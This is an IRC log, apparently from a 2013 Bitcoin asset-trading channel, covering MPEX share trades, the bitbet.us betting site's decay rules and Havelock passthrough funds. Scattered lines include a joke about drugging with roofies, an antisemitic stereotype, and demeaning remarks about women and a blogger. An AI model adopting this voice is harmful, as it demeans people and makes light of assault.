ad slots seems a bit expensive tho. Jan 07 10:01:45 We've put a tracking link and going to see if it gets any results. Jan 07 10:05:42 last i checked (maybe a year ago ?) they were horrible. Jan 07 10:14:37 http://business.time.com/2012/12/20/libor-scandal-yep-its-as-bad-as-we-thought/ Jan 07 10:14:42 heh just catching up on all the juice. Jan 07 10:14:48 MPBOR, moar serious than LIBOR Jan 07 10:21:44 Well now they're at 100 - 130k weekly impressions. Jan 07 10:21:51 per slot **** BEGIN LOGGING AT Mon Jan 7 18:21:56 2013 Jan 07 18:35:43 "As for Quentin, he has other clients and has, from what I was briefly told, been busy filling in for other attorneys in the office while they were away. I'm hoping to speak with him today to get an updated timeline for the verified claims lists and terms of service for the VPS site." Jan 07 18:35:58 this doesn't sound so good. Jan 07 18:41:46 mircea_popescu what doesn't sound good about it, we are still dealing with holiday issues, nbd Jan 07 18:42:53 it sounds to me like the lawyer guy is getting drowned in drama and is inches away from throwing his hands up at the entire thing. Jan 07 18:43:01 because forumer time is not worth money and lawyer time is. Jan 07 18:43:11 lol Jan 07 18:43:17 he's getting paid Jan 07 18:43:22 nothing to worry about there Jan 07 18:43:34 aite. Jan 07 18:43:49 not like you care since you aren't claiming anyway Jan 07 18:44:42 there are about 8 ppl crying in the gigamining thread, the rest are emailing me, being polite, and working through this thing with me Jan 07 18:44:51 8 out of 300 Jan 07 18:45:26 i don't care other than in the vague macro sense that it'd be best if this actually works as opposed to not working. Jan 07 18:46:17 i've done everything i've said i'd do, and as i've said, i'm waiting on Quentin Jan 07 18:47:29 i'm not saying you haven't. Jan 07 18:49:05 bah. so this guy made FOUR deposits before actually hitting one right. Jan 07 18:49:13 wtf! Jan 07 18:54:12 mircea_popescu: haha hope it wasnt me!? mine have all been right i think (and thanks for just processing my 80BTC deposit) Jan 07 18:56:42 well whoever it was! &sure. Jan 07 19:05:15 [MPEX] [S.DICE] 1000 @ 0.00469227 = 4.6923 BTC [-] Jan 07 19:05:17 [MPEX] [S.DICE] 230 @ 0.00469226 = 1.0792 BTC [-] Jan 07 19:05:17 [MPEX] [S.DICE] 1720 @ 0.00467397 = 8.0392 BTC [-] Jan 07 19:18:01 mircea_popescu: are you involved in bitbet.us Jan 07 19:18:03 ? Jan 07 19:18:12 yes. Jan 07 19:18:15 K Jan 07 19:18:33 MPOE-PR posted something about the site in the YABMC thread Jan 07 19:18:46 didn't know the site existed ;) Jan 07 19:18:56 hehe it was just launched a day or two ago Jan 07 19:18:59 it's on mpex too. Jan 07 19:19:03 ahh Jan 07 19:19:58 more detailed there Jan 07 19:21:08 mircea_popescu: do you have any insight yet on btcamazon? Jan 07 19:22:38 im not in a hurry Jan 07 19:24:22 you should be come a bookie Jan 07 19:24:50 if i wanted to become a bookie i think i'd have done it by now tho Jan 07 19:25:32 JWU42>PS - 7 total bets - perhaps an insufficiently small sample size. Jan 07 19:25:35 go ahead and fix that Jan 07 19:25:51 :p Jan 07 19:30:28 i was thinking of a sports bet Jan 07 19:30:33 but the game is today :( Jan 07 19:49:56 aww jcpham gotta do them earlier Jan 07 19:50:10 always a bridesmaid Jan 07 19:51:30 lol Jan 07 19:51:35 did you get my last message mircea_popescu Jan 07 19:51:38 i didn't know you crossdressed Jan 07 19:52:01 well see, it's impossible for me to check seeing how i don't know whats "last" in your context :) Jan 07 19:52:13 mr. bloggerman said get in touch Jan 07 19:52:26 o o yea he emailed. Jan 07 19:52:28 via forum and/or skype Jan 07 19:52:32 k cool Jan 07 19:53:09 ok these noobs are starting to get on my nerves. Jan 07 19:53:20 so! the "business idea" in share "investing" is to create market inefficiencies Jan 07 19:53:28 whereby prices to artificially pop on lack of liquidity ? Jan 07 19:53:33 waht the fuck is wrong with them! Jan 07 19:54:15 urlpls Jan 07 19:54:34 i bet it is a link to bitcointalk? Jan 07 19:56:40 yes lol Jan 07 19:56:58 https://bitcointalk.org/index.php?topic=134684.msg1438119#msg1438119 Jan 07 19:59:34 [MPEX] [S.DICE] 2250 @ 0.00467792 = 10.5253 BTC [+] Jan 07 19:59:36 [MPEX] [S.DICE] 1000 @ 0.00467398 = 4.674 BTC [-] Jan 07 19:59:37 [MPEX] [S.DICE] 350 @ 0.00467397 = 1.6359 BTC [-] Jan 07 19:59:59 [MPEX] [S.DICE] 770 @ 0.00467397 = 3.599 BTC [-] Jan 07 20:00:01 [MPEX] [S.DICE] 3000 @ 0.00464344 = 13.9303 BTC [-] Jan 07 20:00:02 [MPEX] [S.DICE] 800 @ 0.00460652 = 3.6852 BTC [-] Jan 07 20:00:03 [MPEX] [S.DICE] 194 @ 0.0045735 = 0.8873 BTC [-] Jan 07 20:00:04 [MPEX] [S.DICE] 400 @ 0.00456159 = 1.8246 BTC [-] Jan 07 20:00:05 [MPEX] [S.DICE] 4000 @ 0.00449163 = 17.9665 BTC [-] Jan 07 20:00:07 [MPEX] [S.DICE] 4000 @ 0.00448487 = 17.9395 BTC [-] Jan 07 20:00:07 [MPEX] [S.DICE] 1000 @ 0.00444001 = 4.44 BTC [-] Jan 07 20:00:08 [MPEX] [S.DICE] 3200 @ 0.00443811 = 14.202 BTC [-] Jan 07 20:00:09 [MPEX] [S.DICE] 4800 @ 0.00441955 = 21.2138 BTC [-] Jan 07 20:00:10 [MPEX] [S.DICE] 3148 @ 0.00441386 = 13.8948 BTC [-] Jan 07 20:00:11 [MPEX] [S.DICE] 729 @ 0.004312 = 3.1434 BTC [-] Jan 07 20:03:06 kakobrekla: heh - nah Jan 07 20:03:48 jcpham: ROLL TIDE! Jan 07 20:03:52 what is havelock investments Jan 07 20:03:54 yes Jan 07 20:04:02 i think some sort of fund/exchange Jan 07 20:06:29 i was checking out their site Jan 07 20:08:40 jcpham: i run havelock investments Jan 07 20:08:43 ask away :) Jan 07 20:08:58 ;;gettrust topace Jan 07 20:08:59 Trust relationship from user mircea_popescu to user topace: Level 1: 0, Level 2: 2 via 1 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=topace Jan 07 20:09:07 o hey. had no idea. Jan 07 20:09:21 so explain it Jan 07 20:09:24 looks mostly canadian Jan 07 20:09:29 ;;getrating topace Jan 07 20:09:29 WARNING: Currently not authenticated. User topace, rated since Wed Jun 8 15:37:29 2011. Cumulative rating 19, from 8 total ratings. Received ratings: 8 positive, 0 negative. Sent ratings: 6 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=topace Jan 07 20:09:58 it has a mutual fund feel Jan 07 20:10:06 started as our mining fund Jan 07 20:10:21 then when we looked at exchanges to list our fund on, i couldnt find a decent one Jan 07 20:10:23 so i wrote my own Jan 07 20:10:36 the exchange is private? Jan 07 20:10:36 https://www.canadianbitcoins.com/ still going ? Jan 07 20:10:38 so for a while, the only security listed on my exchange, was our own mining fund Jan 07 20:10:42 no, its public Jan 07 20:10:47 mircea_popescu: yup Jan 07 20:11:25 mircea_popescu: ~2000BTC/day volume, not huge, but pretty good since i only deal with canadians :p Jan 07 20:11:53 you and dt should form amalgamated american bitcoin traders Jan 07 20:13:50 Havelock passthru now has 2% of all SDICE shares that have been released (200,000 of 10,000,000) Jan 07 20:15:09 i guess if we count pt's as institutional investors that takes us to about .7% total Jan 07 20:15:10 not so bad Jan 07 20:15:38 0.7% of what ? Jan 07 20:15:49 of float Jan 07 20:16:04 s.dice ipo was 10% Jan 07 20:16:26 < topace> Havelock passthru now has 2% of all SDICE shares that have been released (200,000 of 10,000,000) << heh, sounds like I finally have some competition Jan 07 20:16:49 I'm sure I offer a better deal than havelock Jan 07 20:16:55 how much do you hold ? (unless it's a sikrit) Jan 07 20:17:11 about twice that Jan 07 20:17:40 i did 200,000 in 2 days :p lol Jan 07 20:17:50 couldnt keep my public offerings open they kept selling out Jan 07 20:17:59 ya the glbse pt had the same issue. Jan 07 20:18:05 topace: you run it? Jan 07 20:18:14 smickles: i run havelock investmetns Jan 07 20:18:17 you probably should just float a larger set. Jan 07 20:18:52 topace: well, you can probably top me, I don't have a 'web presence' for what I do Jan 07 20:18:59 [MPEX] [S.DICE] 3000 @ 0.00457769 = 13.7331 BTC [+] Jan 07 20:19:07 why is that ? Jan 07 20:19:28 i don't need one, it seems Jan 07 20:19:44 heh Jan 07 20:19:55 lol whatever works i say. Jan 07 20:20:24 yea :p with teh success of the SDICE passthru i was considering doing a MPOE passthru as well :p not sure if it'd be as susccessful though Jan 07 20:20:43 competition is a good thing :) Jan 07 20:20:53 or a bbet pt after ipo Jan 07 20:21:03 i imagine Ukto is prolly going to do something like that too Jan 07 20:21:51 Ukto will just code a new bbet or smth Jan 07 20:22:00 ill bet you he won't :D Jan 07 20:22:05 place it Jan 07 20:22:11 lmao Jan 07 20:25:41 I'm quite entertained by texts sent to me by accident Jan 07 20:25:43 "Randy is going to call you in a minute with an update" Jan 07 20:26:38 coinabul is on the radio Jan 07 20:26:51 http://overseasradio.com/ Jan 07 20:27:17 why's there such high bids for S.BBET ? Jan 07 20:27:49 it's not floated yet Jan 07 20:27:52 i guess people want in ? Jan 07 20:29:49 ;;later tell namworld PS, somebody please tell bitvps to fix their SSL certificate, I can't pay my bill with them until they do this. If they don't get their act together right-quick I'm dropping them from the signcryption network. I've been pestering them about this for two weeks now and am pretty unimpressed with the lack of any sort of response. Jan 07 20:29:49 The operation succeeded. Jan 07 20:30:54 so if there's higher bids than the IPO price, what happens? it just takes the highest and works down? Jan 07 20:30:58 when the IPO starts? Jan 07 20:31:57 11th Jan 07 20:32:15 and yes Jan 07 20:32:16 i remember mircea_popescu saying that mpex is socialist in order matching Jan 07 20:32:28 lol ? Jan 07 20:32:48 it's not who placed the order first, if there are multiple orders which would match, they split it Jan 07 20:33:43 hm Jan 07 20:33:54 can live.coinbr chart the orderbook Jan 07 20:34:04 or it needs to go live before that Jan 07 20:34:12 working off that likely flawed memory, all the bids @ or above the first block would proportionally split the first block Jan 07 20:34:19 !ticker b.bet Jan 07 20:34:21 Invalid ticker. Jan 07 20:34:25 meh Jan 07 20:34:59 and then all bids @ or above the second block proportionally split that one, and so on Jan 07 20:36:16 http://bitbet.us/bet/16/ << heh, it's like calculating the delta Jan 07 20:38:53 smickles that's aside tho, Jan 07 20:39:06 kakobrekla it will prolly chart it once it's live Jan 07 20:39:28 so now i have to code my own chart. Jan 07 20:39:30 :D Jan 07 20:39:57 why ? Jan 07 20:39:59 lol Jan 07 20:40:09 cause i wanna SEE Jan 07 20:40:15 hahaha Jan 07 20:40:18 ok ok. Jan 07 20:41:05 http://mpex.co/mpex-mktdepth-jsonp.php Jan 07 20:41:16 it was there all along, neh ? Jan 07 20:41:22 dunno Jan 07 20:41:28 jurov!"!!!!! Jan 07 20:43:19 lol Jan 07 20:43:25 neither jurov nor ukto are true coders Jan 07 20:43:26 they sleep. Jan 07 20:43:37 lol Jan 07 20:43:56 im low on food gotta run to the store bbl Jan 07 20:44:45 oh my, I just realized, when I'm writing a program, i tend to smoke in place of sleeping Jan 07 20:45:44 this is how we find out kakobrekla doesn't have a gf Jan 07 20:47:04 if i fixate on a task, i find it difficult to sleep Jan 07 20:47:15 so i tend to not fixate on any one task for too long Jan 07 20:47:36 quick done. next. Jan 07 20:48:16 accually, i havent left yet Jan 07 20:48:20 and the bitch came back. Jan 07 20:48:40 aww poor girl. Jan 07 20:49:27 yeah after the gpg contract things went back to normal! Jan 07 20:49:42 you have a gpg contract with your gf ? Jan 07 20:49:53 twas a joke but im thinking about it Jan 07 20:50:23 ill give -10 if she splits again. Jan 07 20:50:37 ahaha Jan 07 20:50:52 i had a meeting. eve true coders have meetings Jan 07 20:50:57 *even Jan 07 20:51:00 so, what is? Jan 07 20:51:05 jurov Jan 07 20:51:06 we just missed you Jan 07 20:51:10 19:41.01 ( mircea_popescu ) http://mpex.co/mpex-mktdepth-jsonp.php Jan 07 20:51:15 make this into pictures pls Jan 07 20:51:28 fuck 9 min remaining Jan 07 20:51:30 brb Jan 07 20:52:22 kakobrekla, which asset? Jan 07 20:52:42 jurov he just gott excited about bbet Jan 07 20:59:47 no cigar. depth['S'] is undefined :/ Jan 07 21:00:09 well ya, there's no S activity yet. Jan 07 21:03:16 but Jan 07 21:03:20 i want my cigar. Jan 07 21:03:21 :( Jan 07 21:04:30 i dub thee sir kakobrekla lewinsky the 2nd Jan 07 21:04:44 whats the "4`085`852` shares" on the S.DICE volume graph? Jan 07 21:04:52 volume over the period of the graph? (whatever that is?) Jan 07 21:06:22 !ticker s.dice Jan 07 21:06:24 [MPEX:S.DICE] 1day: 0.004312 / 0.00461387 / 0.0047888 (116066 shares, 535.51 BTC), 30day: 0.0014 / 0.00334271 / 0.0048 (13760569 shares, 45,997.67 BTC) Jan 07 21:06:30 can't be. Jan 07 21:06:45 well, maybe if it was weekly ? Jan 07 21:08:42 would be nice if numbers made sense :p Jan 07 21:11:19 http://live.coinbr.com/images/1357585780134.png Jan 07 21:11:23 nothing to die for Jan 07 21:11:37 it werks Jan 07 21:11:43 F Jan 07 21:11:50 maddox can draw a better fire engine. Jan 07 21:11:57 lol Jan 07 21:12:25 topace, its the max daily volume for the month Jan 07 21:12:59 o that was the 10k+ day huh Jan 07 21:13:32 Buglouse: ahh! thanks :) Jan 07 21:13:44 lmao poor Buglouse Jan 07 21:13:47 so that big red bar on the volume chart Jan 07 21:14:44 mircea_popescu: are you MPOE-PR on bitcontalk? im trying to figure out what the hell adamstgBit is talking about here: https://bitcointalk.org/index.php?topic=134684.40 Jan 07 21:16:27 she's my pr. Jan 07 21:18:09 http://live.coinbr.com/?mpsic=S.BBET now working Jan 07 21:18:21 thanks jurov Jan 07 21:18:47 also S.BVPS... but you need to select a month to see anything Jan 07 21:19:44 nothing in my opera for bvps and month Jan 07 21:20:06 a Jan 07 21:20:08 interesting Jan 07 21:20:17 chrome works bvps even for daily Jan 07 21:20:18 :) Jan 07 21:20:40 not surprising as it's code form google Jan 07 21:23:04 i remember many more smaller orders for s.bbet, what happened? Jan 07 21:23:17 mpex coalesced them for display? Jan 07 21:23:22 They got cancelled Jan 07 21:23:26 buy the ordered Jan 07 21:23:31 because they would not be filled Jan 07 21:23:39 due to the current higher bids Jan 07 21:23:41 ya i guess ppl took them away Jan 07 21:23:49 i didn't do nuttin. Jan 07 21:23:50 price discovery Jan 07 21:26:27 about 1mn of the total 3mn spoken for too Jan 07 21:26:29 impressive. Jan 07 21:26:53 trade will start jan 11 00:00 or 24:00 ? Jan 07 21:27:15 how do you answer such a question lol Jan 07 21:27:18 [MPEX] [S.MPOE] 10000 @ 0.00063901 = 6.3901 BTC [-] Jan 07 21:27:19 [MPEX] [S.MPOE] 12000 @ 0.000639 = 7.668 BTC [-] Jan 07 21:27:20 early on the 1tth not late on the 11th Jan 07 21:27:20 [MPEX] [S.MPOE] 3847 @ 0.00063899 = 2.4582 BTC [-] Jan 07 21:28:07 hehe ok. i mean it like 24:00 is coming after 23:59 Jan 07 21:28:10 [MPEX] [O.BTCUSD.C100T] 825 @ 0.36111486 = 297.9198 BTC [+] Jan 07 21:28:15 well it is. Jan 07 21:33:56 [MPEX] [S.DICE] 1000 @ 0.00445174 = 4.4517 BTC [-] Jan 07 21:34:36 [MPEX] [S.DICE] 850 @ 0.00445174 = 3.784 BTC [-] Jan 07 21:42:31 it's not who placed the order first, if there are multiple orders which would match, they split it Jan 07 21:42:35 true? Jan 07 21:43:14 dude, from what i recall the conversation was that mpex shouldn't be splitting them Jan 07 21:43:20 but treat oldest first. Jan 07 21:43:31 about... one year ago Jan 07 21:43:42 thanks. for a moment my hair has risen dramatically Jan 07 21:43:54 when i imagined what would that do with coinbr Jan 07 21:45:40 and the socialistic thing was a lol remark in passing Jan 07 21:45:43 should i dig through logs ?! Jan 07 21:46:01 no, i believe you Jan 07 21:47:11 i must be wary of smickles in the future Jan 07 21:47:42 lol Jan 07 21:47:54 if he uses such methods to disturb the competition Jan 07 21:50:01 ;;seen smickles Jan 07 21:50:03 smickles was last seen in #bitcoin-assets 1 hour, 5 minutes, and 16 seconds ago: oh my, I just realized, when I'm writing a program, i tend to smoke in place of sleeping Jan 07 21:50:29 don't support smoking. use coinbr Jan 07 21:51:24 lmao Jan 07 21:52:22 i have no idea why people'd want price conflict anyway. Jan 07 21:52:49 ;;seen thestringpuller Jan 07 21:52:49 thestringpuller was last seen in #bitcoin-assets 2 minutes and 46 seconds ago: ;;seen smickles Jan 07 21:53:24 lol Jan 07 21:53:27 a loop! Jan 07 21:53:30 heh, jurov, I did start that statement with something about how I thought it was based of flawed assumptions Jan 07 21:53:57 "For the past few days, I am disturbed, greatly worried, and upset about my ruthless mistake of having sex with my girlfriend. I'm a believer in Christ and my girlfriend is not. " Jan 07 21:54:22 so that's why usagi went bonkers Jan 07 21:54:27 "and my girlfriend turns out to not be very good in the sack" fifh. Jan 07 21:56:29 wait, there's an answer. Jan 07 21:56:30 Answer: Jan 07 21:56:30 You raised a number of good issues and hopefully I'll be able to address most of them. Jan 07 21:56:30 What you describe is a typical trap of Satan. Jan 07 21:59:19 “Our findings demonstrate that infidelity and number of sexual partners are both under moderate genetic influence (41% and 38% heritable, respectively) and the genetic correlation between these two traits is strong (47%).” Jan 07 21:59:25 somebody doesn't quite grok statistix Jan 07 22:01:03 http://torgronsund.com/2013/01/07/cofounders-and-thieves/ Jan 07 22:01:16 that article is missing the word bitcoin Jan 07 22:01:34 otherwise it reads like a bitcointalk post Jan 07 22:01:46 must be really hard to be anonymous when your name actually is tor. Jan 07 22:02:05 haha Jan 07 22:02:51 "suddenly had been withdrawn" Jan 07 22:02:58 ppl putting suddenly where suddenly doesn't belong Jan 07 22:03:08 what time of the day does the bitbet betting cutoff take place? Jan 07 22:03:09 i never heard of a half hour spirited bout of bank withdrawals Jan 07 22:03:18 kakobrekla ^ Jan 07 22:03:23 If betting ends on Jan 12th, when does that occur? Jan 07 22:03:29 midnight gmt Jan 07 22:03:30 it reads like the bitcoin magazine debacle Jan 07 22:03:33 very important for sports betting Jan 07 22:03:35 ok Jan 07 22:03:36 where vladimir was billing them for emails Jan 07 22:03:44 like start of the day or end of day midnight GMT Jan 07 22:03:45 ? Jan 07 22:03:55 00:00 or 24:00 :) Jan 07 22:04:05 end Jan 07 22:04:08 ok Jan 07 22:04:33 bettings stops before that Jan 07 22:04:37 2-7 days Jan 07 22:04:54 jcpham i dunno why people got so excited. if i were involved with that caliber of idiots i'd be billing 10 btc an hour too. Jan 07 22:05:18 he did keep good records Jan 07 22:05:45 you need to expand those options Jan 07 22:05:46 the 2-7 day thing Jan 07 22:05:55 wait i might have given you wrong info Jan 07 22:05:59 because the time decay to zero will kill late betting Jan 07 22:06:01 im just cheking what i coded now Jan 07 22:06:02 no you are correct Jan 07 22:06:05 yes allow 12 hour bets so i can take money from chumps Jan 07 22:06:14 oops did i say that Jan 07 22:06:30 I want to set the resolution date later than the event Jan 07 22:06:39 but cutoff betting prior to event Jan 07 22:06:58 otherwise nobody will bet late. Jan 07 22:06:58 so that event decay is only to ~70% of starting value Jan 07 22:07:12 I would actually prefer no decay. Jan 07 22:07:19 over decay to zero Jan 07 22:07:27 curretly decay is from start to the time when the betting stops not the resolution date Jan 07 22:07:38 mp said it wrong then Jan 07 22:07:45 ok Jan 07 22:07:52 is it possible to have a user selected decay rate? Jan 07 22:08:12 it was planed at the begining but thrown out later on Jan 07 22:08:29 i dunno Jan 07 22:08:55 It is absolutely necessary if you want there to be serious betting volumen Jan 07 22:09:05 most people want to bet close to event Jan 07 22:09:12 but wont if they are getting 1:10 odds Jan 07 22:09:18 because they are late to the party Jan 07 22:09:29 odds are the same, weight is different Jan 07 22:09:41 the weight defines the odds Jan 07 22:09:45 for the bettor Jan 07 22:10:04 any new bets are diluted Jan 07 22:10:10 based on the decay Jan 07 22:10:26 there is some marginal utility for a decay Jan 07 22:10:28 odds of wining or losing are the same Jan 07 22:10:34 your EV Jan 07 22:10:35 the amount of reward differs Jan 07 22:10:41 EV is all that matters Jan 07 22:10:47 but thats not odds Jan 07 22:10:57 ok fine Jan 07 22:11:08 i mean yeah Jan 07 22:11:09 EV is strongly negative Jan 07 22:11:13 for different subjects Jan 07 22:11:13 for both sides of a bet Jan 07 22:11:21 different decay would be 'more apropriate' perhaps Jan 07 22:11:22 after 25% decay Jan 07 22:11:35 but decay must happen Jan 07 22:11:37 if the odds are properly expressed Jan 07 22:11:38 why? Jan 07 22:11:53 no seriously, user-suggestable decay will prolly be in gold Jan 07 22:11:56 this is beta recall. Jan 07 22:11:57 decay is not used in ANY real wagering site Jan 07 22:11:59 only the failure that is betsofbitcoin Jan 07 22:12:25 mp will take over from here. Jan 07 22:12:27 ;) Jan 07 22:12:28 Anyway, I'll be back later Jan 07 22:12:34 I have discussed with him too Jan 07 22:12:41 Bugpowder the main problem is that iots so hard to user-specify Jan 07 22:12:44 without reimplementing lisp\ Jan 07 22:12:56 Then have a switch Jan 07 22:13:02 decay or no decay Jan 07 22:13:06 i think that's the minimal solution yes. Jan 07 22:13:23 [MPEX] [S.MPOE] 18958 @ 0.00063757 = 12.0871 BTC [-] Jan 07 22:13:49 did you guys know bit-pay has an invoice tool? Jan 07 22:13:57 yes Jan 07 22:14:06 i've been wanting to play with it Jan 07 22:14:43 Decay only makes sense for events like "BFL will ship by x date" Jan 07 22:15:01 it does not make sense for "Broncos will beat Ravens on Saturday" Jan 07 22:15:09 in a limited sense it does Jan 07 22:15:17 (if you bet this week before bronco star kills itself) Jan 07 22:15:29 Right Jan 07 22:15:31 but certainly the linear decay makes no sense in most such situations Jan 07 22:15:49 as in, it's a pretty dumb macro attempt to handle discrete events Jan 07 22:15:51 Yes, a much less steep slope would be good for those circumstances Jan 07 22:16:05 for binary events with a fixed event time Jan 07 22:16:22 i agree Jan 07 22:16:41 final/gold/retail/2.0/we you wanna call it is scheduled for february sometime Jan 07 22:16:42 anyway. I'm going to hold off placing up my props until that is implemented. Ready to drop 100BTC to seed the site with some good sports bets. Jan 07 22:16:47 this'd be one of the things that'd be addressed Jan 07 22:17:00 NFL playoffs will be over by then Jan 07 22:17:00 it's just, it's something that can benefit from a little marketplace input Jan 07 22:17:22 Well I'm giving it right now Jan 07 22:17:25 [MPEX] [S.DICE] 600 @ 0.00436997 = 2.622 BTC [-] Jan 07 22:17:49 [MPEX] [S.DICE] 173 @ 0.00457769 = 0.7919 BTC [+] Jan 07 22:17:57 Gotta run. talk about it later. Jan 07 22:18:19 later Jan 07 22:18:51 also Jan 07 22:19:05 cutoff really should be able to go to 1 day before the event Jan 07 22:19:24 70% of the action come day before an event. Jan 07 22:19:32 (guess) Jan 07 22:24:02 prolly. Jan 07 22:26:41 Bugpowder: you should build tha Jan 07 22:32:29 [MPEX] [S.MPOE] 2542 @ 0.00063757 = 1.6207 BTC [-] Jan 07 22:32:31 [MPEX] [S.MPOE] 8100 @ 0.00063747 = 5.1635 BTC [-] Jan 07 22:32:32 [MPEX] [S.MPOE] 5550 @ 0.00063698 = 3.5352 BTC [-] Jan 07 22:32:33 [MPEX] [S.MPOE] 12858 @ 0.00063603 = 8.1781 BTC [-] Jan 07 22:37:01 http://www.dailymotion.com/video/x8m5d0_everything-is-amazing-and-nobody-i_fun#.UOswjESxrXN Jan 07 22:38:13 jcpham left that tor dood a comment. real curious if he publishes it. Jan 07 22:38:32 heh Jan 07 22:38:43 it reads Jan 07 22:38:43 you didn't call him a moron did you? Jan 07 22:38:45 This write-up is so very… noobish I have serious doubts you have any business in business. Jan 07 22:38:45 And you claim to be teaching others “entrepreneurship” ?! Really ? Ridiculous. Then again I guess this is how academia became irrelevant in the marketplace, by hiring complete noobs to be “teaching”. Jan 07 22:38:45 Seriously, stick to what you know and understand. Boardrooms aren’t for everyone. Jan 07 22:39:00 i didn't call him a moron literally because he'd not have comprehended how true it is. Jan 07 22:39:07 you have to draw it out for the morons. Jan 07 22:39:17 [MPEX] [S.DICE] 2400 @ 0.00446786 = 10.7229 BTC [-] Jan 07 22:39:19 [MPEX] [S.DICE] 100 @ 0.00446786 = 0.4468 BTC [-] Jan 07 22:39:36 that article is popular on the ycombinator scene today Jan 07 22:39:39 as you can imagine Jan 07 22:39:42 color me unsurprised. Jan 07 22:39:46 fucking scenesters. Jan 07 22:39:52 it's literally became a roadshow attraction. Jan 07 22:40:17 there are a couple aggregate news sources i follow daily if i have the time Jan 07 22:40:18 young-ish sorta out of shape pasty ass jew today can either go into the stand-up comedy scene or the start-up comedy scene Jan 07 22:40:25 the HN stuff is usually hilarity Jan 07 22:40:34 alot of the VC's thoughts and stuff Jan 07 22:40:49 http://www.florian-rappl.de/html5/projects/SuperMario/ Jan 07 22:40:53 ima end up hiring moar pr chicks. Jan 07 22:40:55 ^ also grabbed my attention today Jan 07 22:40:58 where am i to find em ;/ Jan 07 22:41:18 pigeons will pretend to be alady Jan 07 22:41:35 lol Jan 07 22:42:04 omg teh sound Jan 07 22:50:20 [MPEX] [S.MPOE] 4653 @ 0.00063851 = 2.971 BTC [+] Jan 07 22:50:21 [MPEX] [S.MPOE] 3917 @ 0.00064933 = 2.5434 BTC [+] Jan 07 22:52:13 would anyone object if i wrote a Havelock bot to output stuff here using identical format to assbot ? Jan 07 22:53:56 [MPEX] [S.MPOE] 2330 @ 0.00065144 = 1.5179 BTC [+] Jan 07 22:54:40 havelock bot? Jan 07 22:55:31 dub: for trades on www.havelockinvestments.com Jan 07 22:56:47 oic, check with kakobrekla Jan 07 22:57:22 why not just pipe to assbot ? Jan 07 22:58:22 mircea_popescu: that would work too, how do i do that ? Jan 07 22:58:43 who wrote assbot ? Jan 07 22:58:52 kakobrekla Jan 07 22:58:55 there's a spec somewhere Jan 07 22:59:25 that would be ideal :) Jan 07 23:01:47 kakobrekla: you there? can you let me know how to interface with assbot ? Jan 07 23:02:31 hahaha Jan 07 23:02:46 that last line was classic Jan 07 23:03:20 topace: buy it flowers and a bottle of wine Jan 07 23:03:38 lol Jan 07 23:03:40 ;;seen Ukto Jan 07 23:03:40 Ukto was last seen in #bitcoin-assets 11 hours, 19 minutes, and 20 seconds ago: and someone has to find all my secrets Jan 07 23:03:42 alternatively rophynol Jan 07 23:04:22 r-o-o-f-i-e-s for assbot Jan 07 23:04:32 working title for my sci-fi porno Jan 07 23:04:34 who | grep -i assbot | date; cd ~; unzip; touch; strip; finger; mount; gasp; yes; uptime; umount; sleep Jan 07 23:05:28 umount; sleep is my favorite part Jan 07 23:05:53 maybe gf got back with a printed gpgun and fixed him. Jan 07 23:06:12 so what happened to Ukto? Jan 07 23:07:01 ? Jan 07 23:07:05 yeah. what happened to ukto Jan 07 23:07:31 Diablo-D3 how is DMC coming along? Jan 07 23:07:41 when can i tour the datacenter Jan 07 23:07:46 Ukto: I thought you wanted the list Jan 07 23:07:54 jcpham: never, blame nefario Jan 07 23:07:59 :( Jan 07 23:08:00 Ukto where is dat ff7 Jan 07 23:08:10 thestringpuller: did you get my msgs abou tit? Jan 07 23:08:11 Diablo-D3: pm Jan 07 23:08:38 how much for it? Jan 07 23:11:57 [12:45] neither jurov nor ukto are true coders < -- damn straight. and dont you forget it. Jan 07 23:12:09 lol Jan 07 23:12:29 [12:23] i imagine Ukto is prolly going to do something like that too & [12:24] Ukto will just code a new bbet or smth <-- ... .. *whisltes....* ... >,> Jan 07 23:12:46 lol Jan 07 23:13:03 [23:55] what was the original deal? 5btc? Jan 07 23:13:08 althought, i am concerned about disc.. 2 Jan 07 23:13:31 i can faintly see some light circular scratches. but being black bottom, its shiney as hell, if you run your nail back and forth over it, it does make a slight noise :/ Jan 07 23:14:18 put it into gramophone then Jan 07 23:15:04 lol Jan 07 23:15:10 I'm hoping for a site to pop up with floating rates the way intrade used to work. Jan 07 23:15:18 anyone here know how intrade used to work ? Jan 07 23:15:25 (i never used it) Jan 07 23:15:46 never even heard of it Jan 07 23:18:10 Ukto: do you have a playstation to test them? Jan 07 23:19:13 o i see, it was just a simple market simulation. Jan 07 23:19:15 not sure where the ps1 is Jan 07 23:19:28 but I do have a p2 and a 1st gen ps3 Jan 07 23:19:32 ps2 Jan 07 23:19:40 should all have support I think Jan 07 23:20:00 althoguh Jan 07 23:20:01 fair warning Jan 07 23:20:03 if I start playing Jan 07 23:20:07 I might not sell Jan 07 23:20:12 until i have beat the game Jan 07 23:20:13 :P Jan 07 23:20:55 ill see if I can test it late tonight when the kids get to bed and i can hook thign sto the tv without 1mil questions Jan 07 23:48:42 mircea_popescu I posted some sports stuff. We will see how the decay works. Jan 07 23:50:23 approved. Jan 07 23:53:37 how long does it take for the bet values to update? Jan 07 23:53:43 should have 2 confirms Jan 07 23:53:54 by now Jan 07 23:56:52 showin up now Jan 08 00:00:25 1 confirm basically Jan 08 00:00:40 but i guess there may be second-level delays due to chain parsing etc Jan 08 00:05:18 all good Jan 08 00:05:39 R U RDY 4 SOME FOOTBALL?? Jan 08 00:05:44 lol Jan 08 00:05:52 i couldn't even tell you who won if i watched a match Jan 08 00:06:14 Confirmed total: 225 BTC Jan 08 00:06:17 !ticker S.DICE Jan 08 00:06:19 [MPEX:S.DICE] 1day: 0.004312 / 0.00461688 / 0.0047888 (108318 shares, 500.09 BTC), 30day: 0.0014 / 0.00334312 / 0.0048 (13765692 shares, 46,020.49 BTC) Jan 08 00:06:26 this is pretty good tho, bitbet seems stuck on 100 btc bet a day Jan 08 00:06:29 ;;ticker Jan 08 00:06:30 BTCUSD ticker | Best bid: 13.51931, Best ask: 13.53998, Bid-ask spread: 0.02067, Last trade: 13.53998, 24 hour volume: 21012.52240497, 24 hour low: 13.40400, 24 hour high: 13.54999, 24 hour vwap: 13.49166 Jan 08 00:06:42 Well, we will see Jan 08 00:07:18 I think the site can be a success with the right exposure and the right audience with enough coins and interest in the propositions Jan 08 00:07:47 and selectable decay :) Jan 08 00:07:52 ;;calc 1*365*20/10000000 Jan 08 00:07:53 0.00073 Jan 08 00:08:00 fo 